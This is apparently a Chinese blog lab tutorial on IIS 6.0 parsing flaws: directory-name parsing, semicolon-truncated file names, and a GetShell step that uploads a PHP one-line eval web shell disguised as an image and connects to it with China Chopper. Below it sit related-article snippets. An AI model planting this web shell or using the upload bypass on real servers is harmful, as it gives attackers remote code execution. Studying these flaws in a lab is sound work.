IIS解析漏洞

最新推荐文章于 2024-09-05 21:41:24 发布
最新推荐文章于 2024-09-05 21:41:24 发布
阅读量337 收藏 4
点赞数 9
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_68186313/article/details/140799792
版权

一、目录解析

在网站下建立文件夹的名字为,asp或者.asa的文件夹,其目录内的任何扩展名的文件都被IIS当作asp文件来解析并执行。

启动Windows Server 2003 Enterprise Edition

打开默认网站,新建1.asp,在里面再新建1.txt,写入一段代码“<%=now%>”

使用物理机访问192.168.188.129/1.asp/1.txt

二、畸形文件解析

在IIS 6处理文件解析时,分号可以起到截断的效果。也就是说shell..asp;jpg会被服务器看成是shell.asp。另外lS 6.0默认的可执行文件除了asp还包含asa\cer\cdx

打开默认网站,新建1.asp;.jpg

使用物理机访问

三、GetShell

将PHP一句话木马写到shell.php并更改后缀为shell.jpg上传到目标站点利用解析漏洞进行访问

一句话木马

<?php @eval($_POST['pass']);?>

访问

用中国菜刀连接

 

浅秋沐玖
关注
  • 9
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
IIS解析漏洞复现
m0_56578216的博客
09-08 525
IIS解析漏洞和nginx的背锅解析漏洞实际上相同,都是由于配置不当出现的漏洞,并且配置都是属于同一个,关于nginx的解析漏洞可以看我的这篇博客http://t.csdn.cn/BtyyJ。
IIS漏洞
scu_hacker博客
01-18 3388
一、PUT文件写入 1.1 影响范围 IIS6.0 1.2 漏洞详情 由于IIS开启了扩展webDAV,并且配置了写入权限,导致可以上传文件 可以首先抓包使用OPTIONS方法查看能够使用的http方法 然后使用PUT方法上传一个jsp内容的txt文件 接着使用MOVE方法将此txt文件移动到其他地方并且改名为.asp文件 然后直接连接就行。 二、短文件漏洞 2.1 漏洞原理 为了兼容DOS命令,windows为长文件名文件生成...
iis解析漏洞
注定风是不羁旅人
03-20 685
目录解析(5.0-6.0) 形式:www.xxx.com/xx.asp/xx.jpg 原理:服务器默认会把.asp目录下的文件解析为asp 文件解析 形式:www.xx.com/xx.asp;.jpg 原理:服务器默认不解析;号后面的内容,因此xx.asp;.jpg就会被解析为asp文件 解析文件类型 iii6.0默认的可执行文件除了asp文件还包括以下三种 .asa .cer .cdx ...
Apache、iis解析漏洞
qq_44836237的博客
02-17 2246
Apache解析漏洞 test.php.xxxxx 任意不属于黑名单且不属于Apache解析白名单之内的后缀名都可以使用 mime.types文件 在unbuntu下路径/etc/mime.types 在windows下路径C:/apache/conf/mime.types(类似这样的,注意Apache安装路径) 该文件是一个一对多的映射表,定义了某一种文件类型,对应的几种后缀 一个文件名为test.php.aaa.bbb.ccc的文件,Apache会从ccc的位置向php的位置尝试开..
第24课 iis解析漏洞利用
07-04
iis解析漏洞利用,通过学习文档内容,熟悉并掌握 IIS 写入漏洞利用工具的利用方法,了解具体的功能内容,亲自实践操作,并根据课程需求完成相关任务。 工具功能说明 IIS 写入漏洞利用工具是由桂林老兵写的一款...
Web应用安全IIS解析漏洞.pptx
06-19
**IIS解析漏洞详解** **一、什么是IIS** IIS(Internet Information Services)是由微软公司提供的一个Web服务组件,它包含了多种网络服务,如Web服务器、FTP服务器、NNTP服务器和SMTP服务器。这些服务主要用于...
修复iis解析漏洞_修复典型的iis 10漏洞并进行安全审核
weixin_26636643的博客
08-25 3946
修复iis解析漏洞You will generally be in good shape using IIS 10 to securely host websites, but there are some changes you must make to pass a security audit. 使用IIS 10安全地托管网站通常会保持良好状态,但是必须进行一些更改才能通过安全审核。 Al...
【数据隐私与安全】数据隐私保护与安全管理
weixin_39372311的博客
09-01 934
数据隐私与安全已成为当今社会不可忽视的重要问题。企业需要在遵守法律法规的基础上,采取有效的技术和管理措施,确保数据的安全与隐私不受侵犯。在未来,随着安全技术的不断发展,数据隐私保护将会更加完善,为企业和个人的数据资产保驾护航。
浅谈网络安全的认识与学习规划
qq_201729558
09-05 263
本文主要介绍网络安全认识与学习规划
九盾叉车U型区域警示灯,高效照明和安全警示
jiuxindianzi的博客
09-05 151
九盾叉车U型区域警示灯,LED光源,U型光线设计,覆盖广,亮度高,适应多车型,防护等级高,使用寿命长,有效防止叉车碰撞事故,提升作业安全性。
智能对决:提示词攻防中的AI安全博弈
weixin_41496173的博客
09-05 399
在2024年上海AIGC开发者大会上,知名提示词爱好者工程师云中嘉树发表了关于**AI提示词攻防与安全博弈**的精彩演讲。他深入探讨了当前AI产品的安全现状,提示词攻击的常见手段及其应对策略。本文将对他的演讲进行详细的解读与分析,并结合实际案例和技术手段,探讨如何在AI应用开发中提高安全性。
【看雪-注册安全分析报告】
09-05 876
看雪学苑(www.kanxue.com)是一个专注于PC、移动、智能设备安全研究及逆向工程的安全综合服务网站!创建于2000年,历经20多年的发展,看雪网站形成了大量有价值的技术资料,经过看雪团队的共同努力,先后出版过数本技术专著,深受出版社和广大读者好评,社会影响深远,在行业中树立了令人尊敬的专业形象。平台为会员提供安全知识的在线课程教学,同时为企业提供智能设备安全相关产品和服务。
深入解析反射型 XSS 与存储型 XSS:原理、危害与防范
最新发布
2301_77160226的博客
09-05 328
反射型 XSS 和存储型 XSS 都是常见的 XSS 攻击类型,它们的原理和危害有所不同,但都可以对用户造成严重的危害。为了防范 XSS 攻击,我们需要采取一系列的措施,如输入验证和过滤、输出编码、使用安全的 API 和框架等。同时,我们也需要教育用户提高安全意识,不要点击来自不可信来源的链接,不要在不可信的网站上输入敏感信息。
安全入门day.04
mxxcxy的博客
09-01 1015
MD5加密是一种广泛使用的密码杂凑函数,它可以将任意长度的信息通过一系列复杂的数学和位操作转化为一个128位(16字节)的散列值(hash value),这个散列值通常被表示为一个32位的十六进制数。MD5加密在信息安全领域有着重要的应用,但需要注意的是,随着计算技术的发展,MD5加密的安全性已经受到挑战,不再适用于需要高安全性的场合。如果仍然需要使用MD5,可以考虑采取一些额外的安全措施来提高其安全性。
【论文速读】| SEAS:大语言模型的自进化对抗性安全优化
m0_73736695的博客
09-05 533
在初始化阶段,红队模型和目标模型分别使用不同的数据集进行微调,以增强红队模型生成对抗性提示的能力和目标模型的指令遵循能力。此外,实验还发现,SEAS框架能够在保持模型通用能力的同时,显著增强其抵御攻击的能力。传统方法通常无法有效揭示模型的潜在漏洞,因此,SEAS框架旨在通过自我进化的方式,迭代提升红队模型和目标模型的能力,从而在无需人工干预的情况下增强LLMs的安全性能。SEAS框架的核心优势在于减少了对人工测试的依赖,提供了一种自动化的、安全性持续提升的解决方案,为LLMs的安全部署提供了强有力的支持。
高压喷雾车的功能与应用_鼎跃安全
ShenZhenDingYue的博客
09-05 145
在灭火行动中,高压喷雾车的高效作业能成功阻止了火势蔓延,还能保护救援人们群众的财产安全,极大缩短了灭火时间,减少了火灾损失。高压喷雾车不仅在森林灭火中发挥不可替代的作用,其还能在山地、复杂地形和火势迅速蔓延的情况下,保护生命财产安全。在一次森林火灾中,位于山区的一个小型度假村附近突然起火,由于山风强劲,火势迅速蔓延,消防部门立即调派多辆高压喷雾车赶往现场。由于高压喷雾车产生的细水雾可以迅速蒸发吸热,有效降低火场温度,同时水雾还能将空气中的烟雾和有害气体迅速沉降,保护了周围的生态环境和救援人员的安全
数据治理策略:确保数据资产的安全与高效利用
weixin_44835050的博客
09-05 183
数据治理是企业数字化转型的关键环节,也是确保数据资产安全、高效利用的重要保障。面对数据治理的挑战,企业应制定明确的策略和实施路径,加强数据治理团队的建设和培训,积极鼓励员工学习考取数据治理领域证书(如DAMA-CDGA/CDGP),建立统一的数据治理平台,并持续优化数据治理策略。只有这样,企业才能在激烈的市场竞争中保持领先地位,实现可持续发展。
聚铭网络受邀成为ISC终端安全生态联盟首批成员单位
juminfo的博客
09-05 93
同时,产品还具备异构数据融合、异构联动处置、异构设备纳管等能力,智能化对接管控各类安全设备,实现跨平台、跨系统的安全协同,为企业构建起全方位、立体化的安全防护网。公司拥有完备的“云+端”产品服务体系,覆盖安全托管、安全管理、安全审计等多个方面,能够在资产运营维护、漏洞识别治理、合规性监管等关键环节提供高效的服务,确保客户资产的安全得到全方位管理和持续优化。公司将以此为契机,进一步深化与联盟成员的合作与交流,共享资源和技术,共同提升终端安全的整体水平,为构建更加安全、可信的数字世界贡献自己的力量!
iis8.5解析漏洞
08-31
IIS(Internet Information Services)是微软开发的一款用于在Windows操作系统上托管和发布网站的Web服务器软件。而IIS 8.5是IIS的一个版本。 所谓的解析漏洞是指由于服务器在解析用户提交的URL请求时没有正确验证或过滤,导致攻击者可以通过构造恶意的请求来绕过服务器的安全机制,进而执行未经授权的操作。 IIS 8.5的解析漏洞会导致以下问题: 1. 目录遍历:攻击者可以通过构造特定的URL请求,获取网站服务器上的敏感文件或目录,从而获得未经授权的访问权限。 2. 文件包含:攻击者可以通过构造特定的URL请求,将自己的恶意文件包含在服务器响应的页面中,当用户访问该页面时,恶意文件会被执行,从而实现远程命令执行或注入攻击。 3. SQL注入:攻击者可以通过构造特定的URL请求,将恶意的SQL代码注入到服务器后台数据库中,从而获取数据库中的敏感信息或篡改数据。 4. 远程命令执行:攻击者可以通过构造特定的URL请求,远程执行服务器上的命令,获取服务器的访问权限,从而导致服务器遭到控制。 为了防止IIS 8.5解析漏洞,我们可以采取以下安全措施: 1. 及时更新:定期安装微软官方发布的最新安全补丁,确保服务器上的IIS 8.5始终保持最新版本。 2. 配置安全策略:通过限制服务器上IIS 8.5的访问权限、禁用不必要的功能和服务、设置安全的文件和目录权限等来减少攻击面。 3. 输入验证和过滤:确保服务器能够对用户提交的URL请求进行有效的验证和过滤,过滤掉恶意的请求,防止攻击者利用解析漏洞进行利用。 4. 安全编码:开发人员在编写网站代码时应遵循安全编码的最佳实践,避免常见的漏洞,如目录遍历、文件包含和SQL注入等。 总之,IIS 8.5解析漏洞是存在的,但我们可以通过更新和配置安全策略等措施来防止被利用。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值